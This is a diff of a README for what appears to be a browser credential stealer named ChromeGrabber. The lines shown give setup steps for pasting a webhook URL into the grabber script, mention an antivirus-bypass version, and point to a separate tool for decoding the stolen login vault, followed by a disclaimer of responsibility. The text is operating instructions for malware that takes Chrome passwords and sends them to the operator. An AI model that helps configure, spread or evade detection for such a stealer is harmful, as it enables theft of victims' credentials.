VirusNoirrr/ChromeGrabber/README.md

 `4: Click Copy Webhook Url`
 `5: Paste It On grabber.py webhook=""`
 `Enjoy`

+#Note :

+`You Need To Decode The Login Vault In (grabber_avbypass.py) With https://github.com/VirusNoirrr/LoginVaultDecoder I Made That One Because It Cause Problems In AVBypasser !
+(Dont Send The Passwords)`
 # Attention

 **Im Not Responsible For Any Illegal Activitys.**